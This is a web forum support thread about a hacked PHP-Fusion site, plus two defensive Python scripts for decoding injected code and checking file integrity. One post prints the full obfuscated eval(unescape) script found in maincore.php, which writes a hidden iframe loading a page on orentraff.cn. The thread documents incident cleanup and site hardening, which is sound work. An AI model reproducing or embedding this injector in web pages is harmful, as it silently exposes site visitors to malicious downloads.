
orentraff.cn hacker?

Viewed 5,469 times
Puma (Member) asked:

Hi people..

When I navigate through my sites I see an unknown address appearing for a fraction of a second; it mostly appears when I use the back & forward buttons in my browser window.

www.uwkabaal.com/images/orentraff.gif

I used Google to find out more about that orentraff.cn domain and it seems it is a domain that's hosted in China and that it is some kind of hacker.
But no idea what this hack (if it is a hack) does.
I can't find any damage or alterations that were done to my sites.
Anyone else that experienced this problem?

This is what I found using Google:

"orentraff.cn is a domain name. The code was calling something from
another server into an invisible iframe. That something is probably
malicious."
Edited by Puma on 29-05-2008 03:25


Puma (Member) answered:

I have checked those files but nothing to find..

Wow.. I guess that's like looking for a needle in a haystack lol B)

Why does a site always give those problems that are driving me insane :D
I'm going mad I tell you.. maaad.. maaad.. maaaaaaaaaaaaad!!! lol

Well I guess I have to look for that code in every index.php file in every folder.
I will let you know if I find it, in about 3 weeks or something :D
Edited by Puma on 29-05-2008 05:33
muscapaul (Veteran Member) answered:

It may be code that was injected into the database. Make a backup of your database in SQL format. Open it in a text editor and search for the orentraff.cn string.
If you want to make certain it is not in one of the files, you can use a program like AgentRansack to search all files in your folder (a copy on a local server) for the orentraff string, or maybe even for files calling an iframe.
Ken (Senior Member) answered:

It can also be that the hacker has placed some code in one of your side panels. This will also be discovered if you do as Paul says above. It can also happen that the hackers place their code in one of the .php files on your site (more hassle to find then), but then they need to use FTP.
HobbyMan (Veteran Member) answered:

A quick Google search reveals you're not alone. This seems to be a serious threat...
http://www.murga-linux.com/puppy/view...mp;t=26767

There are plenty of queries like yours but few fixes. Several threads mention transfer of registration details, etc.

You should probably disable your site until solved.

p.s. I don't know if it's a coincidence or not, but when I opened this thread I got a virus warning from my AVG...

Virus identified JS/Downloader Agent
Detected on open

Sorry, I couldn't be more help :(
Edited by HobbyMan on 29-05-2008 11:44
Homdax (Fusioneer) answered:

Probably checked already, but do you have any other files in your root folder that are not PHPFusion related?
Also have a peek at any .htaccess file.

I would delete all files in the root folder (not subfolders) and upload new ones from a fresh release.

Puma, what is that link in your signature, the last one:
uwkabaal.com/sig.png

??
Edited by Homdax on 29-05-2008 11:50
Puma (Member) answered:

Homdax: I didn't find any files that are not PHP-Fusion related, but I will take a closer look at it.
The missing image you see in my signature is the dynamic_signature that shows an image with some live site information, but for some reason it stopped working after I upgraded to the most recent version of Fusion.
(But I see now that an admin must have removed it by now hehe..)

Quote

I would delete all files in the root (not subfolders) folder and upload new ones from a fresh release.

I'm afraid that's not really an option because most files are modded for some infusion or mod.

Muscapaul: yup, with the info I found on the net I also saw that it could be some code that was injected into the DB; I will make an SQL backup this evening when I come home from work and search it with Notepad++ ;)
And thanks for the tip regarding that AgentRansack program; it will be much easier to find it like that than to search every file manually.

I'm not quite sure what that trojan does, since I don't see any changes to my sites, or how it managed to get into one of the files.
But one thing I'm sure of is that it has nothing to do with a possible PHP-Fusion leak, because it can be found on several sites that are not running Fusion.

I'll have a closer look this evening when I get home ;)
Edited by Puma on 29-05-2008 16:46
Homdax (Fusioneer) answered:

Quote

I'm afraid that's not really an option because most files are modded for some infusion or mod.

Tough, but you will OBVIOUSLY have them all properly documented, the code changes, and can hence start fresh.
Honestly Puma, don't get me wrong, if it turns out the hack is among those files and you don't know how the modded code should look, and have no documentation of it, I really don't feel very sorry for you.

Document. Backup. Implement. Backup. Run. ...for your life. ;)
Falk (Super Admin, Project Manager) answered:

It's not that much code, just a simple iframed redirect, so no need to overdo it.

Naturally, if it's not in the files and all files have been checked, the next step would be the DB ;)
Basti (Veteran Member) answered:

Yes, check all files and your database.
And change your passwords; if they have access to your database, they can do what they want with your site...

I wrote a little guide about what to do when you got hacked:
http://www.php-fusion.co.uk/forum/vie...ost_115733
Puma (Member) answered:

I made an SQL backup and searched the SQL file with Notepad++ for words like 'orentraff', '.cn/default/cgi' etc., but the file was clean.

I also made a complete FTP backup of one of the "infected" domains and searched it with the AgentRansack program that Muscapaul suggested (which is a very good tool to search multiple files/folders), but that FTP backup was also clean.

Could it be that the injected code was written in Chinese so that it can't be detected by a program that is designed to work with Western chars?

In my FTP there are multiple domain folders, so is it possible that the code was placed in another domain folder and that all domains get infected this way?

@Homdax: Yes, I always keep the mods/infusions I use in a folder on my PC, with all readme files included of course..
But that folder was on my other PC and unfortunately that HD crashed last week, so I don't have all the original files anymore or all readmes. ;)
I think it's a little pointless to remod my whole site just to find some code imo hehe..
Xessive (Senior Member) answered:

Search the DB and files again for sig.png.
Maybe there's some file called sig.png that contains some malicious code which tries to connect to the orentraff website to start some CGI script.
Also search your entire PC, including system files/folders and hidden files/folders, for sig.png.
Edited by Xessive on 30-05-2008 00:50
starefossen (Senior Member) answered:

Xessive: No, and what you guys are referring to is the same thing as in my signature.

You'll find it here (you'll have to be logged in to download it).
Puma (Member) answered:

Yep, I'm not sure why HobbyMan received a virus warning from my sig thingy, because it's exactly the same one as Starefossen is using ;)

Yeah, I'll scan my PC also ;)
Maybe it's some kind of trojan on my PC that f*cks with my browser (strangely enough only with my own sites then lol)
Puma (Member) answered:

Btw, I think I found an answer in this forum: http://board.awempire.com/printthread...php?t=6895

It seems the hacker scrambled his code, the way you can find online converters to make HTML source code unreadable.
In my maincore file I found the exact same code as they talked about on that site:

<!-- ~ --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%35%5C%75%30%30%36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
</script><!-- ~ -->


This code was at the bottom of my maincore.php file, right after the ?>
I removed it and now it seems to be OK again; I still don't understand how the hell they got into my FTP. :@
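The block Puma found above can be read without ever running it, and the same script can do the search muscapaul described earlier (the SQL dump and a local copy of the files, for the orentraff string or for iframes). The following is an added example, not code from this thread or from PHP-Fusion: it reverses the two encoding layers of the snippet (percent-encoding as JavaScript's legacy unescape() does it, then the \uXXXX escapes) with plain string operations, then reports indicators in both the raw and the decoded text. The embedded sample is the snippet from Puma's post, used here as constructed test input; the indicator list and the function names are this example's own choices.

```python
"""Locate and decode eval(unescape(...)) injectors in a site copy or SQL dump, without executing them."""
import re
from pathlib import Path
from typing import Dict, List

# Indicators taken from the thread: the domain Puma saw flash by, and the hidden-iframe
# pattern muscapaul suggested searching for. Extend the tuple for your own case.
SUSPICIOUS_DOMAINS = ("orentraff.cn",)
EVAL_UNESCAPE_RE = re.compile(r'eval\s*\(\s*unescape\s*\(\s*(["\'])(.*?)\1\s*\)\s*\)', re.S)
IFRAME_SRC_RE = re.compile(r'<iframe\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
PERCENT_RE = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')
UNICODE_ESC_RE = re.compile(r'\\u([0-9a-fA-F]{4})')

# The block Puma reported at the tail of maincore.php, copied from the post above and
# embedded here as constructed test input for this script.
_BLOB = "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%35%5C%75%30%30%36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"
SAMPLE_INJECTED = (
    '<!-- ~ --><script type="text/javascript">\n'
    'eval(unescape("' + _BLOB + '"));\n'
    '</script><!-- ~ -->'
)


def js_unescape(s: str) -> str:
    """Mimic JavaScript's legacy unescape(): %XX and %uXXXX become characters. Nothing is executed."""
    return PERCENT_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_unicode_escapes(s: str) -> str:
    """Resolve the \\uXXXX sequences that make up the second obfuscation layer."""
    return UNICODE_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def decode_eval_unescape(text: str) -> List[str]:
    """Return the plaintext each eval(unescape("...")) call in `text` would have run."""
    return [decode_unicode_escapes(js_unescape(m.group(2))) for m in EVAL_UNESCAPE_RE.finditer(text)]


def extract_iframe_srcs(html: str) -> List[str]:
    """Pull the src attribute out of every <iframe> in `html`."""
    return IFRAME_SRC_RE.findall(html)


def _indicators(text: str, name: str, layer: str) -> List[Dict[str, str]]:
    hits = [{"file": name, "layer": layer, "indicator": "iframe", "detail": src}
            for src in extract_iframe_srcs(text)]
    low = text.lower()
    hits += [{"file": name, "layer": layer, "indicator": "domain", "detail": d}
             for d in SUSPICIOUS_DOMAINS if d in low]
    return hits


def scan_text(text: str, name: str = "<string>") -> List[Dict[str, str]]:
    """Report indicators in the raw text, then again inside each decoded eval(unescape()) payload."""
    findings = _indicators(text, name, "raw")
    for payload in decode_eval_unescape(text):
        findings.append({"file": name, "layer": "raw", "indicator": "eval_unescape", "detail": payload})
        findings += _indicators(payload, name, "decoded")
    return findings


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js", ".sql", ".txt")) -> List[Dict[str, str]]:
    """Walk a local copy of the FTP backup (or the folder holding the SQL dump) and scan each file."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            findings += scan_text(path.read_text(encoding="utf-8", errors="replace"), str(path))
    return findings


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for f in (scan_tree(target) if target else scan_text(SAMPLE_INJECTED, "maincore.php")):
        print(f"{f['file']}: [{f['layer']}] {f['indicator']}: {f['detail']}")
```

Run it with the path to the local copy of the site (or the folder containing the .sql dump); with no argument it scans the embedded sample. A plain search for "orentraff" in the raw files misses this block, because the name only exists after decoding, which is why the searches described earlier in the thread came back clean; searching for `eval(unescape(` finds it directly.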
starefossen (Senior Member) answered:

You can do that through PHP, so if you have access to, say, custom pages, you can make it write to maincore as it is writable!
MrSimple (Senior Member) answered:

What can we do to prevent this injection into our sites?
Make maincore unwritable? Remove custom pages? Or something else?
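One way to turn Homdax's "document, backup" advice and MrSimple's question about making maincore unwritable into a repeatable check, as an added example that is neither from this thread nor PHP-Fusion's own code: hash every PHP/JS/HTML/.htaccess file of a known-good copy of the site (a fresh release, or your documented modded install) into a baseline manifest, re-hash later and list what changed, appeared or vanished, and flag files whose permission bits let group or others write. The file names and the one-line "infected" contents used in the test are constructed.

```python
"""Baseline integrity manifest and loose-permission check for a PHP site tree (added example)."""
import hashlib
import json
import stat
from pathlib import Path
from typing import Dict, List

# Files that an injected writer (custom page, upload handler, stolen FTP login) would most
# plausibly modify; .htaccess is matched by name because it has no suffix.
WATCHED_SUFFIXES = {".php", ".js", ".html", ".htm"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _watched(path: Path) -> bool:
    return path.is_file() and (path.suffix.lower() in WATCHED_SUFFIXES or path.name == ".htaccess")


def manifest_from_mapping(files: Dict[str, bytes]) -> Dict[str, str]:
    """Hash an in-memory {relative path: contents} mapping (used by the test; same shape as on disk)."""
    return {name: sha256_hex(data) for name, data in files.items()}


def manifest_from_tree(root) -> Dict[str, str]:
    """Hash every watched file under `root`, keyed by its path relative to root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_hex(p.read_bytes())
            for p in sorted(root.rglob("*")) if _watched(p)}


def compare_manifests(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Diff two manifests: which watched files changed, appeared or disappeared since the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def writable_by_group_or_others(mode: int) -> bool:
    """True when the mode bits let anyone but the owner write (0666, 0664, ...)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_loosely_writable(root) -> List[str]:
    """Watched files under `root` whose permissions allow group/other write, relative to root."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix() for p in root.rglob("*")
                  if _watched(p) and writable_by_group_or_others(p.stat().st_mode))


def save_manifest(manifest: Dict[str, str], path) -> None:
    Path(path).write_text(json.dumps(manifest, indent=1, sort_keys=True), encoding="utf-8")


def load_manifest(path) -> Dict[str, str]:
    return json.loads(Path(path).read_text(encoding="utf-8"))


if __name__ == "__main__":
    import sys
    # usage: integrity.py baseline <site_root> <manifest.json>   (on a known-good copy)
    #        integrity.py check    <site_root> <manifest.json>   (later, on the live copy)
    action, site_root, manifest_path = sys.argv[1:4]
    if action == "baseline":
        save_manifest(manifest_from_tree(site_root), manifest_path)
    else:
        diff = compare_manifests(load_manifest(manifest_path), manifest_from_tree(site_root))
        for kind, paths in diff.items():
            for p in paths:
                print(f"{kind}: {p}")
        for p in find_loosely_writable(site_root):
            print(f"loosely writable: {p}")
```

Take the baseline from the documented copy kept off the server, so that a modded file counts as "clean" and only an unplanned edit (like the tail appended to maincore.php in this thread) shows up as modified. The permission check only catches group/world-writable files; when PHP runs as the file's owner, as starefossen's point about custom pages implies, owner-write is enough for the injection, and the hash comparison is what catches it.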
Xessive (Senior Member) answered:

Quote

MrSimple wrote:
What can we do to prevent this injection into our sites?
Make maincore unwritable? Remove custom pages? Or something else?

Run the latest and completely un-modded version of PHPFusion...
Whenever you use an infusion from a 3rd party there is a chance that some code
will be unsafe and vulnerable to SQL injections...

I don't know if there's a tool of some kind which can check PHP code for
sloppy code which makes SQL injections possible.
If someone knows about such a tool please post it here..!!
muscapaul (Veteran Member) answered:

Quote

MrSimple wrote:
What can we do to prevent this injection to our sites?
Make maincore unwritable? Remove custom pages? Or something else?

In v6 a hacker only needs the password of an administrator with Custom Page access to be able to do this. In v7 it will be more difficult to do the same thing as the culprit needs to acquire two passwords: a login password of an administrator and that admin's admin password that he/she has set to perform a number of admin actions (among those work on Custom Pages). Another new security feature in v7.
starefossen (Senior Member) answered:

Prevent your site from getting hacked:

1. Always run the latest and greatest version of the system (PHPFusion)

2. Be careful with infusions / mods made by 3rd parties.

3. Never give custom pages / panels access to admins who don't need it. Only give such access to those you trust.

4. Your MySQL, FTP and admin user passwords must be different!

5. Change all passwords on a regular basis

6. Never use your admin user password as a user password at another site!
alcazar (Senior Member) answered:

For dealing with the cracker / script kiddie just send Homdax on a trip to China.
(like he did with the Turkish ones :P )
